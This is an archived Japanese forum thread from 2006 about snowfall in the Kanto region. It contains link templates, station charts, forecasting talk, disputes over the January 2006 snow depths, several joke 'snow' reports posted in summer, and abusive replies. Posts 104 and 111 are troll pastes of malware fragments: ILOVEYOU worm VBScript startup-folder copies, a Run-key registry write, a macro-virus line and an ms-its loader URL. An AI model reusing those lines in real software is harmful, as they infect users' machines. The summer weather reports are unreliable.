5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

**関東降雪情報スレッドVOL.48**

1 :名無しSUN:2006/08/15(火) 20:00:41 ID:Zfa3V6TF
前スレ:
**関東降雪情報スレッドVOL.47**
http://science4.2ch.net/test/read.cgi/sky/1144335318/

気象:
     電子閲覧室   http://www.data.kishou.go.jp/index.htm
     気象庁      http://www.jma.go.jp/jma/index.html
     国土環境     http://www.bioweather.net/
     WNI        http://mws.wni.co.jp/cww/
     日本気象協会  http://tenki.jp/
  
レーダー:
     東京アメッシュ    http://tokyo-ame.jwa.or.jp/
     東電レーダー    http://www0.thunder.ne.jp/
     アメネットさいたま  http://www.amenet.pref.saitama.jp/
     レインアイよこはま http://www.city.yokohama.jp/cgi/bousai/wwwroot/yokohama1/sewer_radar.html
 
天気図:
     国際気象海洋 各種予報、天気図        ttp://www.imoc.co.jp/index.htm
     北海道放送 各種専門天気図          ttp://www.hbc.co.jp/pro-weather/index.html
     アルゴス 各種専門天気図            ttp://www.argos-net.co.jp/awc/fx_top.php
     韓国気象庁                     ttp://www.kma.go.kr/eng/index.jsp
     米国環境予測センター 東アジア各種天気図 ttp://grads.iges.org/pix/ea.fcst.html
     UNISYS 東アジア                  ttp://weather.unisys.com/aviation/index_easia.html
         (9日間気圧配置)       
         ttp://weather.unisys.com/mrf/9panel/mrf_500p_9panel_easia.html


2 :テンプレ:2006/08/15(火) 20:02:09 ID:Zfa3V6TF
◎積雪あり ○雪 □あられ・凍雨 △みぞれ ▲雨優勢のみぞれ ×雨 −降水なし ?不明・他
   
沼田?    日光? 今市?  矢板?那須塩原?大田原?  大子? 里美? 高萩?北茨城?
   渋川?   桐生?    鹿沼? 宇都宮?   茂木? 常陸大宮? 常陸太田? 日立?
    前橋?    足利? 佐野?  栃木?  真岡? 岩瀬?<筑>笠間? 水戸? 湊?  
安中?高崎?伊勢崎?太田?館林?   小山?結城?下館?<波>八郷?友部?大洗? 
富岡?藤岡?本庄?熊谷?行田?加須?古河?下妻?真壁?<山>石岡? 小川?鉾田?
      寄居?東松山?北本?久喜?杉戸?栗橋?水海道?つくば?土浦? 玉造?大洋?
    秩父?  坂戸?川越?大宮?春日部?野田?守谷?取手?牛久?美浦?    潮来?
奥多摩?  飯能? 狭山?志木?浦和?越谷?流山?柏?我孫子? 江戸崎?佐原?  鹿島?
  青梅?羽村?   所沢?和光?川口?三郷?松戸?鎌ヶ谷? 印西?  成田?小見川?  波崎?
 あきる野?福生?東大和?小平?練馬?池袋?八柱? 白井?千葉NT?   富里? 多古? 旭? 銚子?
五日市?昭島?立川?武蔵野?杉並?新宿?東京?市川?船橋?八千代?佐倉?八街? 八日市場?   
高尾?八王子?多摩?狛江?世田谷?品川?台場?浦安?幕張?千葉?四街道?東金?成東?
津久井? 相模原?町田? 麻生?宮前?川崎?          市原?土気?  九十九里?
   愛甲? 厚木?座間?長津田?港北?横浜?         袖ヶ浦?  長柄?茂原?
    伊勢原? 海老名?大和?戸塚?磯子?         木更津?上総牛久? 一宮?
山北?秦野? 平塚?茅ヶ崎?藤沢?鎌倉?金沢?     富津?君津?大多喜?大原?
足柄?中井?二宮?      江ノ島? 逗子?         鋸南? 養老渓谷?勝浦?
箱根?小田原?               葉山?横須賀?    富浦?  鴨川?
 湯河原?                     三浦?      館山?千倉?        【**日**:**現在】

3 :名無しSUN:2006/08/15(火) 20:02:47 ID:Zfa3V6TF
●鉄の掟●
1.必ず本題を語る。
2.煽らない、煽られてもシカト。
3.下記出入禁止諸君やその他困ったレスをする方々には以下のような対処で御願いします。
・スレ違いな話題には、「>>1を嫁」とレスする(適切な板・スレッドに誘導する)
・レスしない、徹底放置
・絶対にレスアンカーを付けてはいけない
・要あれば寡黙にして迅速に通報
◆出入禁止◆
藤沢市(神奈川県藤沢市および同一人物)
大部屋俳優タクゾー・八王子(および同一人物)
毛呂山・高尾・東村山・アンチ御殿場厨・祭テンプレ貼厨・AA貼厨・ガックシ厨
終了厨・排除厨・住み分け厨 ←特に
※上記の地名は個人を指すものであり、特定地域の方々を排除するものではありません

★★関東降雪情報スレッドのルール★★
1、好意的な他地域の方々を無理矢理追い出すのはやめましょう。
  喧嘩せずにマターリいきましょう。
2、祭り用テンプレを勝手にいじるのはスレが荒れる元ですので控えましょう。
  現行のものは2005年1月に完成したものです。
3、荒らしは徹底放置しましょう。



4 :名無しSUN:2006/08/15(火) 20:04:07 ID:Zfa3V6TF
4 2006/04/06(木) 23:57:32 ID:bX4nndgG
名無しSUN

ライブカメラ:
箱根ウェブカメラ
http://www.hakone.or.jp/japan/variety/trafficcam/trafficcam.html

名前欄に@を使う方へ:
正しい並びは
[小さい地区名]@[大きい地区名]
なので

県名@市名
市名@区名
という並びにしてる人は間違いです。

正しくは逆なんで注意してください。

〜〜区@東京
こういう並びが正しいわけです。

上空の気温が分かります。
日にち・時間設定して地図の館野の所をクリックするだけ
00Zは日本時間午前9時、12Zは日本時間午後9時
http://weather.uwyo.edu/upperair/sounding.html



5 ::2006/08/15(火) 20:04:54 ID:Zfa3V6TF
前スレが900に近づいてきて、実況次第では大雪になるかもしれないので新スレを立てますた

6 :名無しSUN:2006/08/15(火) 20:05:48 ID:jGbyoRlY
>>5
死ね。氏ねじゃなくて死ね

7 :名無しSUN:2006/08/15(火) 20:19:35 ID:HrFP1UBv
がっかりだよっ

8 :名無しSUN:2006/08/15(火) 20:31:20 ID:gUD5fE+X
いい加減しつこい

9 :名無しSUN:2006/08/15(火) 22:32:11 ID:EtBLt+fC
まあ、今年は「関東のみ」冷夏なので
ピッタリでしょう!!

10 :名無しSUN:2006/08/15(火) 22:41:21 ID:S7CjBBi9
新スレなんか11月になってからでいいだろ
>>1は首つって死んでくれ

11 :名無しSUN:2006/08/16(水) 05:37:24 ID:vNCCuLan
誘導

【8月9月】冬到来までのんびり楽しめ【10月11月】
http://science4.2ch.net/test/read.cgi/sky/1123837198/

12 :名無しSUN:2006/08/16(水) 18:22:54 ID:3MhnJ9pP
>>1


13 :名無しSUN:2006/08/17(木) 08:33:42 ID:EzaWMEqU
低温厨&雪ヲタのアリモリが関東の雪の話を持ち出すまで立てるなよ・・・

ってか、関東降雪のスレ番はシーズンごとに振り出し(1から)で、
また「vol.1」になるんじゃないの?

14 :名無しSUN:2006/08/17(木) 10:10:01 ID:BegIdCsA
まだ2005〜2006シーズンは終わってないし

15 :名無しSUN:2006/08/17(木) 10:46:18 ID:RGJbRKfx
05〜06シーズンは年末まで含まれているのに、06〜07シーズンは年明けだけっておかしいっしょ。

16 :名無しSUN:2006/08/17(木) 21:13:42 ID:r+RKRJsp
あげ

17 :名無しSUN:2006/08/18(金) 22:32:08 ID:WXjry+AC
削除対象アドレス:
http://science4.2ch.net/test/read.cgi/sky/1155639641/ (誘導>>11
http://science4.2ch.net/test/read.cgi/sky/1138288595/ (誘導>>34

削除理由・詳細・その他:
6. 連続投稿・重複 重複スレッド

18 :名無しSUN:2006/08/18(金) 22:32:43 ID:WXjry+AC
誤爆

19 :名無しSUN:2006/08/19(土) 10:30:17 ID:KxttXjKq
>>17-18死ね


20 :名無しSUN:2006/08/20(日) 11:39:26 ID:Rhm0NVwT
2005年〜2006年冬の水上は総降雪量1000cm突破するも,30km南の前橋は総降雪量0cm m9(^Д^)プギャー!!

21 :名無しSUN:2006/08/21(月) 11:10:04 ID:/0nswJeb
>>1死ね

22 :名無しSUN:2006/08/21(月) 16:37:08 ID:NtPzz9p9
今日は雪雲が湧いてこないな。一昨日は凄かったのに

23 :名無しSUN:2006/08/22(火) 10:10:49 ID:uCE+SxOA
>>22


24 :名無しSUN:2006/08/23(水) 12:15:34 ID:eyp3rhfq
冬に前橋から北を見るといつも彼方を雪雲が帯状になっていて嫉妬心を煽られる

25 :名無しSUN:2006/08/23(水) 15:40:58 ID:SFRZ8alC
>>1はアホだが、>>24には同意だ。

26 :名無しSUN:2006/08/25(金) 21:12:50 ID:E2X9EpvL
雪が降らないで有名な伊勢原だけど、経験した大雪・積雪

1984年 この年はかなり積もった
1986年 厚木や海老名には勝らないがかなり積もった
1994年 2月12日 久々の大雪。20pくらい
1996年 2月18日 積雪10〜15p
1998年 1月8日 やはり東京、横浜には及ばないが10〜15p程度
1998年 1月15日 15p〜20cm 吹雪
2001年 1月20日 5〜10cm
2001年 1月27日 5〜10cm
2002年 12月9日 2cm程度
2004年 12月31日 雨転前に1,2cm
2005年 3月4日 2p程度
2006年 1月21日 10cm
2006年 2月4日  5〜10cm
2006年 2月6日 雨転前に3p

27 :名無しSUN:2006/08/26(土) 14:53:45 ID:U7mlJqNM
2006年 8月31日  大山 初冠雪
2006年 9月6日  大山ケーブル山麓駅でうっすら積雪
2006年 9月10日  1〜2cm
2006年 10月6日 雨転前に3p

28 :名無しSUN:2006/09/01(金) 13:36:39 ID:XVqdqEdm
今回の南低はだめか。
次に期待しましょう。

29 :名無しSUN:2006/09/01(金) 23:57:46 ID:dHylSVTP
>>28
アホか!と言いたいところだが、今日は富士山で降雪があったらしいから
冬もそれほど遠くないかな。
ところで、別スレでは来冬はエルニーニョが起こらず、並冬以下になりそ
うって書込みがあった。
予想が当たれば南低頼みの関東は今冬同様、雪には苦戦しそうだね。
西風寒波連発だと岐阜愛知広島あたり、北風寒波連発だと京都滋賀あたり
が祭りか・・・。

30 :名無しSUN:2006/09/02(土) 10:17:52 ID:OGAcuhG4
最近じゃ寒い冬に南低が来てくれた方が確立は上がるけどね
暖冬で南低多発しても気温が高けりゃ全て雨だよ

31 :名無しSUN:2006/09/02(土) 18:06:36 ID:CZKWty9e
>>30
シベリア高気圧が強すぎると低気圧が本土に近づけず、降水域も本土に掛から
ないらしい。
南低の雪はいろいろな条件がうまく重ならないと期待できないところが辛いね。
因みに98年は暖冬だったが関東は南低による雪が多かった。

32 :名無しSUN:2006/09/03(日) 01:58:58 ID:tBWg2iVe
>>29
今年の冬は雪が少ないのですね。
あまり期待しないで待ちます。

33 :名無しSUN:2006/09/03(日) 19:03:08 ID:ii13sQH8
あと数ヶ月で季節到来じゃな。待ちわびたわい

34 :名無しSUN:2006/09/03(日) 19:38:00 ID:mmiZOu9u
>>31
シベリアHが強くても南海上に太平洋高気圧があれば
シベリア高気圧と南の高気圧のぶつかり合いで
前線が出来て降雪或いは積雪する可能性もある。

96年がそれじゃなかった?

35 :名無しSUN:2006/09/03(日) 21:03:10 ID:Cv+ONY3u
>>34
確かに昨年12月のシベリア高気圧と今年2月後半の太平洋高気圧が同時期に
発生すれば可能性はある。
ただ、シベリア高気圧は来冬強力みたいだが、太平洋高気圧は9月10月に最
発達して来冬には出がらしになりそうなのでちょっと厳しいかな・・・。

36 :名無しSUN:2006/09/03(日) 21:48:42 ID:GEx8FS4c
>>34 >>35
うんうん、なるほど。
んで、前橋は?

37 :名無しSUN:2006/09/03(日) 23:01:31 ID:fL7kK4A9
>>36
前橋の場合、直線距離でみると日本海の方が太平洋(外海)より近いという
なかなかの好位置にありながら、三国山脈という雪オタにとってはまさに
嘆きの壁という邪魔があるため、冬型による積雪は絶望的というのが辛いね。

となると南低頼みなのだが、東京で王道(低気圧が八丈島付近通過)=前橋
で王道とは限らない。八丈島よりやや北寄りのコースを進むほうがよいね。
1998年01月15日に33cm積雪したときの天気図があれば詳しくわかるんだけど。
因みに98年は冬型が安定しない冬だったのでその場合、期待できます。

38 :名無しSUN:2006/09/04(月) 00:09:24 ID:F67JTZf0
>>37
なるほどねえ。
前橋って絶妙な場所にあるんですね・・・
詳しい説明ありがとう。

39 :名無しSUN:2006/09/04(月) 13:52:19 ID:FPiw8RZM
筑波山の観測所が復活したし
今年の降雪予想はより精度が増すはず
頼むよ暇人さん

40 :名無しSUN:2006/09/04(月) 15:34:49 ID:VUUwfKwa
A氏も

41 :名無しSUN:2006/09/04(月) 18:37:39 ID:IuE013L7
>>37
そんな詳しいのに何で98.1.15の天気図知らないのさw

42 :名無しSUN:2006/09/04(月) 20:46:54 ID:A/7M89I/
A氏はなぁ・・・筑波山頂データを重要視するだろうが、
基本的に、予想そのものがワンパターン傾向だから(雪寄りのスタイル)。

43 :名無しSUN:2006/09/09(土) 05:18:59 ID:yu8+7RUX
筑波山の観測所が再開したらしいけど何処でデータ見れるの?

44 :名無しSUN:2006/09/09(土) 20:55:43 ID:7UkBAEo8
ネットでも見れるぞ

45 :名無しSUN:2006/09/10(日) 19:18:43 ID:PurEVeQ0
筑波山の気象観測データ
http://hojyo.suiri.tsukuba.ac.jp/mtrealtime/

これも>>1に追加しておかないとだね。
12月中までに30回くらいは質問来るでしょう。

46 :名無しSUN:2006/09/11(月) 00:26:16 ID:J0jfBYna
>>45



去年の冬に聴いてた音楽を
聞くと冬を思い出すなぁ………

47 :名無しSUN:2006/09/11(月) 11:12:28 ID:STATVjlv
昨日は暑かった。

冬はまだまだ遠いな。

48 :名無しSUN:2006/09/11(月) 17:16:45 ID:7tjhOsGy
まだまだ暑いけど上空にはもう秋の気配…

そんな歌が昔あったような…何だったっけ?

49 :名無しSUN:2006/09/11(月) 20:10:36 ID:J0jfBYna
あと4ヵ月か………

去年の冬にオリコンに入った曲を聴くと思い出すなぁ

50 :名無しSUN:2006/09/12(火) 14:25:11 ID:CHqyXmov
明日あたり大雪か?

51 :名無しSUN:2006/09/12(火) 14:38:32 ID:/UhX+j0I
>>50
>>50
>>50


52 :名無しSUN:2006/09/13(水) 03:06:46 ID:Vqev/28n
>>44-45
教えてくれてありがとう。

53 :名無しSUN:2006/09/13(水) 13:19:39 ID:FFjt+3P/
北部から雪に変わって来た模様

54 :名無しSUN:2006/09/13(水) 13:59:55 ID:7qsai4rI
>>53
>>53
>>53


55 :名無しSUN:2006/09/13(水) 18:05:06 ID:CMMxKrIQ
確かに大雪になる気圧配置だな

56 :名無しSUN:2006/09/13(水) 20:52:09 ID:IfELr74u
関東はスカ。
これまでもスカ。
これからもスカ。
めでたしめでたし。

57 :名無しSUN:2006/09/13(水) 21:00:24 ID:CP4cVfAn
前橋は昨冬は全然ダメだったなあ。前橋や宇都宮の降雪量が
東北太平洋側(仙台・宮古など)と差がある原因は単に緯度の違いによる
気温差だけなのでしょうか?もっと接近しててもいいような気がするのですが。

58 :名無しSUN:2006/09/13(水) 21:08:28 ID:9tROefJl
埼玉の人、外出てみ!!
うちの前の畑は真っ白だぞ!

59 :名無しSUN:2006/09/14(木) 11:50:36 ID:MdtyuoxH
>>58
>>58
>>58


60 :名無しSUN:2006/09/14(木) 21:11:12 ID:Wq7FfSnH
やんだね。拝島駅前は商店街の人が雪かきしてる。

61 :名無しSUN:2006/09/14(木) 21:11:59 ID:Wq7FfSnH
やんだね。拝島駅前は商店街の人が雪かきしてる。

62 :名無しSUN:2006/09/15(金) 11:46:52 ID:k4gH151D
>>61
>>61
>>61


63 :名無しSUN:2006/09/16(土) 06:40:51 ID:JcSj+Ecv
東久留米

昨日からの晴天ですっかり雪解け…
子供が作った雪だるまも、朝起きたら水溜まりになってたorz
来週は台風で暑くなりそうだし、大雪は下旬までお預けか?

64 :名無しSUN:2006/09/16(土) 10:33:59 ID:lDIBJXUC
こんなバカばっかりの東京に首都なんか置いてるから日本が崩壊して逝くんだな。

65 :名無しSUN:2006/09/16(土) 12:04:09 ID:Mswc/MQU
>>63
>>63
>>63


66 :名無しSUN:2006/09/16(土) 17:09:17 ID:GsQaD2B7
今夜は実況次第であっと驚く為五郎になるかもよww
みんな各地から報告頼んだwwwwww

67 :名無しSUN :2006/09/16(土) 17:42:42 ID:sOr8Vpus
為五郎さん久しぶり!気温が15度を割ると出てくるんですね。
関係ないけど、フジの高橋マーサアナっておっぱい結構おっきいな

68 :名無しSUN:2006/09/16(土) 20:22:15 ID:Vpfp37Kh
来週火曜は冬型

69 :名無しSUN:2006/09/16(土) 20:29:10 ID:d6Xf1I2M
>>68
俺も思った。久々に見るなぁ
でもいちいちageる事ではない

70 :名無しSUN:2006/09/16(土) 21:13:36 ID:xd/QU/gA
次スレはVOL.1でしょ?

71 :名無しSUN:2006/09/16(土) 22:06:20 ID:Y3fZ3AzO
今頃の季節って別に雪が降らなくたってどうでもいいって思っていられるのに
何で真冬になるとあんなに悔しいんだろう?

72 :名無しSUN:2006/09/16(土) 22:39:16 ID:GsQaD2B7
無駄に寒いくせに他の季節と同じ雨が降るからだとオモ

73 :名無しSUN:2006/09/16(土) 23:46:47 ID:qFhee64B
冬型の場合、西日本の太平洋側でも積雪とかのニュースが流れるからと思う。

74 :名無しSUN:2006/09/17(日) 01:24:15 ID:/pcWuf0D
そうだよなあ。>>73が当たってると思うな。
今は別に雪なんてなくたっていいじゃんて思えるんだけど、
実際冬になってさすように寒い冬型の日に日本海側
のみならず鹿児島や名古屋で積雪のニュースを見て
本当悔しくなるんだもんな。いつも冬の間は関東を
出たくなるよ。今度もきっとそんな思いをするんだろうな。
そう思うと冬が待ち遠しい反面冬が嫌いになりそうだ。
努めてニュースは見ないようにするか・・・。

75 :名無しSUN:2006/09/17(日) 03:01:48 ID:Ox1VrVKQ
>>70
例年通りならリセットされて1に戻る。そして前シーズンの
スレが残骸として残る。
05-06シーズンではそれ以前のも片付けたが、次シーズンは
ここが残骸として放置される予定。

76 :名無しSUN:2006/09/17(日) 16:13:24 ID:VLo1kljk
冬型が崩れた来週後半あたりが山か?
まだ日蔭には残雪があるのに、、今年はやばすぎ((((;゚д゚))))

77 :気温マニア:2006/09/18(月) 00:18:08 ID:uQvzJcHx
>>76 ドコに住んでんの?

78 :名無しSUN:2006/09/18(月) 02:51:39 ID:6ARfwLKN
>>74
鹿児島や高知あたりの雪はほんと悔しいよな。
普段はこっちよりずっと暖かくて楽なのに、雪だけはまともに降るから悔しい。
今冬は冬型の少ないシーズンになってほしい。

79 :名無しSUN:2006/09/18(月) 08:20:12 ID:mp1pQJqU
>>76
うちも川越だけど、昨日まで雪が残ってた。

80 :名無しSUN :2006/09/18(月) 08:25:24 ID:U6p25HLd
>>78
冬型少ないと台湾坊主もダメポみたい、目からウロコですた↓
ttp://science4.2ch.net/test/read.cgi/sky/1137944169/371

81 :名無しSUN:2006/09/18(月) 10:18:40 ID:gozioue+
>>80
じゃあ今年は冬型が多かったのになんで?

82 :名無しSUN :2006/09/18(月) 10:53:59 ID:U6p25HLd
よく読め>>81
偏西風大蛇行のブロッキング型の冬型は、南岸低気圧は発生しない。
昨年の12月はまさにその型。

83 :名無しSUN:2006/09/18(月) 12:58:17 ID:WqMrYNvM
他人の芝は青く見えるって言うのか他スレ、例えば
関西地域のスレを見ていると大阪より東京の方が
雪が多く降っているみたいな感じだな。東京にいると逆に
大阪の方が冬型でも降るし、多く降っている気が
するんだけどね。

84 :名無しSUN:2006/09/18(月) 15:01:31 ID:97odBCtv
去年(昨シーズン)?だったっけか、前日昼くらいまでテレビでは大雪に警戒っていってて、
2ちゃんでは例の如く、終了厨と期待厨が争いあってた。
でも夕方から21時のニュースの頃にはテレビでも、低気圧が南岸から離れるので、大雪の心配はないと。
2ちゃんでも終了厨が勢力を増し、大方が諦めていた。が、深夜に!
東海(紀伊?)沖に突如低気圧が発生。夜明け前からの降雪で都内も大雪っちゅうのが、今でも忘れられない。
深夜〜朝のこのスレの盛り上がりは最高だったな。みんな起きてビックリみたいな。

85 :名無しSUN:2006/09/18(月) 15:31:59 ID:rV4V2/R9
>>84
2006/01/21だな。あれは俺の中で伝説だ

86 :名無しSUN:2006/09/18(月) 15:46:27 ID:Z6NtMI2d
>>84
060121か?
この日は23区東部で大手町はおろか西部をも上回る積雪を記録、
朝のうち、事態が明らかになる前には東部住民の報告が虚偽
呼ばわりされたりもした。
最終的には大手町9cmだったが、ねらー報告では東部の
葛飾区・江戸川区で15cmを超える数値を記録している。
当時うちの方では大手町以下の記録しか出ず、軽い敗北感を
味わったものだ。

ちなみに前日にはこんな単発スレが立ったりもしている。
http://science4.2ch.net/test/read.cgi/sky/1137767692/

87 :名無しSUN:2006/09/18(月) 17:57:35 ID:Ci42ffTc
他スレでは温暖化が進むと南低頼りの地域はだんだん雪を見る機会が減るらしい。
関東は一番厳しいな。

88 :名無しSUN:2006/09/18(月) 18:05:24 ID:zHauomHA
>>84
ええ憶えてますとも。
そんな時でもカヤの外でしたから・・・前橋 orz

89 :名無しSUN:2006/09/18(月) 18:08:43 ID:oDEbI8+O
>>86
さいたまじゃ、普通に降る事が予測できてたし、俺は夜勤なので
降ってることに気づいて全然ビックリしなかった。
が、細かい雪が強風にあおられて地吹雪になるのには まいったね。

90 :名無しSUN:2006/09/19(火) 21:09:59 ID:9MZpfOva
あ〜あ、今週は雪なしか。。

91 :名無しSUN:2006/09/19(火) 21:32:50 ID:Qi9GTGb6
温暖化が進むと接岸が増える。
今年もそれに悩まされるだろうなぁ

92 :名無しSUN:2006/09/20(水) 02:44:12 ID:UmCIEs4z
>>84
その日は千葉の内陸では記録的な豪雪となった。成田空港近くの我が家では
30センチ以上積もり、電車はストップ。バスも3日間運休となり、1ヶ月以上
雪が消えなかった。


93 :名無しSUN:2006/09/20(水) 07:23:10 ID:MW/mfMDg
典型的な水増し報告だな…
嘘をつき続けるうちに自分でも信じ込んでしまうタイプ。

94 :名無しSUN:2006/09/20(水) 08:28:55 ID:xRI8jPK7
>>91
戦前は、南岸爆弾低気圧→猛烈冬型で前線は台湾の南→南岸爆弾低気圧
将来は、北海道爆弾低気圧→北日本冬型で前線北緯30度→北海道爆弾低気圧
現在はこの過渡期にあたっている

95 :名無しSUN:2006/09/20(水) 12:22:56 ID:109GJI94
そのうち関東で、「雪って見た事ある?」なんて会話が聞かれる時代が来るのかorz。

96 :名無しSUN:2006/09/20(水) 12:39:54 ID:Fw1xwu5E
その頃には、水の融点を5度に上げる技術が確立してるから心配いらないよ

97 :名無しSUN:2006/09/20(水) 12:43:58 ID:R+OToG1k
>>92
?俺酒々井だけどあんま積もらなかったぞ。
船橋の方が積もってたくらいだ。10aくらいだけど

98 :名無しSUN:2006/09/20(水) 13:02:34 ID:RFKACIkP
>>93 水増しに良くありがちな変換表
雪の粒を確認→屋根がうっすら、車のボンネットがうっすら
雪で草地がおおよそ白くなる→2〜3センチ
積雪1cm→5cm なぜか車のボンネットで計測する(降雪の深さなら正しいかもね)
・・・
北側の屋根の下集められた雪が残る→2週間の根雪

99 :名無しSUN:2006/09/20(水) 13:12:22 ID:X4n3V9+v
おい、川越だが雪が降ってきたぞ!

100 :名無しSUN:2006/09/20(水) 13:15:03 ID:2scgmQXk
>>92
うちは千葉北西部だけど
19cmだったなぁ ちゃんと定規ではかった。

101 :名無しSUN:2006/09/20(水) 13:43:55 ID:+TgxjmnS
>>100
俺も千葉北西部だけど20cmいかなかったよ

102 :名無しSUN:2006/09/20(水) 14:05:00 ID:K7ShUTdS
どうせ吹き溜まりか1cm=0.5cmぐらいの自家製定規でも使ったんだろ
気にすんな

103 :名無しSUN:2006/09/20(水) 15:15:35 ID:6Ze/gLvT
積雪深の測り方もある程度の規準を作るといいのかもな。
吹きだまりになってない土の上なりアスファルトの上なりに
定規を垂直にぶっ刺せ、みたいな。
雪板が用意できればいいが、設置場所の確保とか一般人には
敷居が高い。

104 :名無しSUN:2006/09/20(水) 15:22:56 ID:2scgmQXk
1:名無しでいいとも! :2006/09/14(木) 21:21:34.40 ID:+3PiN+zD [sage]
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)

105 :名無しSUN:2006/09/20(水) 15:28:55 ID:2scgmQXk
>>101
20cmは
いってないよ?

106 :名無しSUN:2006/09/20(水) 16:13:37 ID:fw1xpXS+
>>93
それは貴方が無知なだけですよ〜。
当日の寒気の様子や天気図、降水量観てれば
>>92は妥当な線と言えまする。

107 :名無しSUN:2006/09/20(水) 17:22:57 ID:K5GLSeUh
>>84書いたものだが、私も千葉北西部、もっと言っちゃうと松戸の五香付近なんだが、
アスファルト上で(吹き溜まりでない5メートル道路の真ん中辺)、
竹定規で測って、19センチだった。
誇張してるとか言ってるのは何なんだろう?あの時積もらなくて嫉妬で言っているのだろうか?

あの日は会社休んで朝から雪かき、お昼に雪かき、夕方にも雪かきで楽しかったな。
子供たちも大喜びだったし。

108 :名無しSUN:2006/09/20(水) 17:36:09 ID:+TgxjmnS
>>105
スマン
自分の所も20cm以下だったに訂正

109 :名無しSUN:2006/09/20(水) 17:46:18 ID:5MF9ECXA
非雪国の積雪計測って、なんか、ポコチンの長さっぽい。(今週の ハァ〜 だなこりゃ)

110 :名無しSUN:2006/09/20(水) 18:13:20 ID:X4n3V9+v
30cm以上積もり(笑)

111 :名無しSUN:2006/09/20(水) 18:24:44 ID:2scgmQXk
6:名無しさん:2006/09/15(金) 20:32:04 ID:mKJPZXcp [sage]
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))   
ms-its:mhtml:file://c:\ 
kak.hta';ken=wd+'START
End Sub

112 :名無しSUN:2006/09/21(木) 00:51:08 ID:zGKBhcfg
うちも千葉北西部(富里)だが、30センチは積もっていたぞ。翌日撮った写真を
みると、庭の鉄柵まで雪が積もっていたのだが、さっき定規で図ったら地面から丁度
30センチあったので、水増し報告ではないのはたしか。それに、当時のテンプレート
みると、30センチ報告がかなりあったので、すべてが水増しと断言するのは
どうかと思う。

113 :名無しSUN:2006/09/21(木) 01:56:02 ID:fYfWOuUq
>>112
禿同!

写真
http://up.spawn.jp/file/up40675.jpg


114 :名無しSUN:2006/09/21(木) 02:02:51 ID:QDgRS82E
我孫子だが過去ログ漁ったら15cmってレスを発見。
あのシーズンでは060121が一番凄かったな。
測定場所は近所の空き地(土)。

115 :名無しSUN:2006/09/21(木) 02:26:26 ID:fYfWOuUq
千葉が一番積もったんじゃね?

116 :名無しSUN:2006/09/21(木) 02:36:11 ID:48beWVoR
大当たり:千葉北西部
中当たり:23区東部
みたいな感じだった希ガス。
翌日か翌々日WNIに積雪量分布が出ていたが、今思えばその時
画像保存しておけばよかったな。

117 :名無しSUN:2006/09/21(木) 02:38:32 ID:fYfWOuUq
あの時に初めて南部で良かったと思った。

しかも粉雪だったしね。

118 :名無しSUN:2006/09/21(木) 07:41:29 ID:telI75Pr
>>117
大方同意だが粉雪話題は振らないでくれ
北海道の雪は(ryとか言う厨が現れるから

119 :名無しSUN:2006/09/21(木) 08:26:19 ID:CY1+vpun
ショボショボ降る水混じりの雪=粉雪だそうです(藁

120 :名無しSUN:2006/09/21(木) 13:24:26 ID:fYfWOuUq
>>119
きも

121 :名無しSUN:2006/09/21(木) 13:29:52 ID:Ag4YJwWf
何か俺が来るといつも荒れるんだけど
もしかして俺が荒らしの根源なのか?

122 :名無しSUN:2006/09/21(木) 14:57:31 ID:ufqIVJCu
雪の降り始めで空気が乾燥しているとき、上空から降ってくる雪の粒が
昇華して粒が細かくなって降ってくることがある。見た目は粉雪だけど
実際は小雪といったほうがいいと思う。

123 :117:2006/09/21(木) 15:18:46 ID:fYfWOuUq
訂正します
×粉雪
○小雪

124 :名無しSUN:2006/09/21(木) 16:59:11 ID:VgjVzAYK


125 :名無しSUN:2006/09/22(金) 15:10:09 ID:wxtUk8gH
また雪か…寒い

126 :名無しSUN:2006/09/22(金) 16:14:47 ID:s6ZUUxeg
海老名も雪が降ってきた!
丹沢あたり白くなって来たが、平野部には降りてくるかな?

127 :名無しSUN:2006/09/22(金) 19:06:16 ID:s6ZUUxeg
やんだorz

128 :名無しSUN:2006/09/22(金) 19:20:00 ID:SuFINbNf
完全に病んでるな

129 :1:2006/09/22(金) 21:48:05 ID:s6ZUUxeg
自己解決しました。
どうもお騒がせしますた

130 :名無しSUN:2006/09/24(日) 02:43:40 ID:NjTQr4NL
神奈川のアメダスは設置数も観測要素も死んでいる‥

131 :名無しSUN:2006/09/24(日) 10:49:11 ID:n7jBLabb
神奈川県東部でまともな観測地点が横浜しかないのはツライ。東部の郊外を
代表する地点が、降水量のみ観測ではねぇ。
相模原や日吉で気温があれば、降水量と気温で冬季の雪の様子もわかるのに。
新たに設置したい地点は、どこにしようか。


